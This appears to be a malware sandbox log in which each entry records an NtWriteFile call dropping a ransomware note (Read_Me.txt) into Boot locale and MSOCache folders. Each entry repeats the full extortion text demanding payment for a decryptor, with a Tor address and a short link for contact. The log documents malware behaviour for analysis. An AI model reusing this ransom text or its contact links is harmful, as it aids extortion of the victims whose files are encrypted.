NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001b4 filepath: \Device\HarddiskVolume1\Boot\cs-CZ\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001d8 filepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001b4 filepath: \Device\HarddiskVolume1\Boot\da-DK\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001b4 filepath: \Device\HarddiskVolume1\Boot\de-DE\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001cc filepath: \Device\HarddiskVolume1\Boot\el-GR\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001cc filepath: \Device\HarddiskVolume1\Boot\en-US\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001e0 filepath: \Device\HarddiskVolume1\Boot\es-ES\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000118 filepath: \Device\HarddiskVolume1\Boot\fi-FI\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001b4 filepath: \Device\HarddiskVolume1\Boot\Fonts\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000294 filepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b0 filepath: \Device\HarddiskVolume1\Boot\fr-FR\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001e8 filepath: \Device\HarddiskVolume1\Boot\hu-HU\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001e8 filepath: \Device\HarddiskVolume1\Boot\it-IT\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001e8 filepath: \Device\HarddiskVolume1\Boot\ja-JP\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b0 filepath: \Device\HarddiskVolume1\Boot\ko-KR\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002c8 filepath: \Device\HarddiskVolume1\Boot\nb-NO\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: \Device\HarddiskVolume1\Boot\nl-NL\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002a8 filepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: \Device\HarddiskVolume1\Boot\pl-PL\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002c8 filepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: \Device\HarddiskVolume1\Boot\pt-BR\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002ac filepath: \Device\HarddiskVolume1\Boot\pt-PT\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002ac filepath: \Device\HarddiskVolume1\Boot\ru-RU\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002a4 filepath: \Device\HarddiskVolume1\Boot\sv-SE\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001e8 filepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000190 filepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002a4 filepath: \Device\HarddiskVolume1\Boot\tr-TR\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002d8 filepath: \Device\HarddiskVolume1\Boot\zh-CN\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002d8 filepath: \Device\HarddiskVolume1\Boot\zh-HK\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000001e8 filepath: \Device\HarddiskVolume1\Boot\zh-TW\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b4 filepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x0000018c filepath: \Device\HarddiskVolume1\Boot\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000158 filepath: \Device\HarddiskVolume1\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b4 filepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000158 filepath: C:\MSOCache\All Users\{90120000-0044-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b4 filepath: C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\1042\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000158 filepath: C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
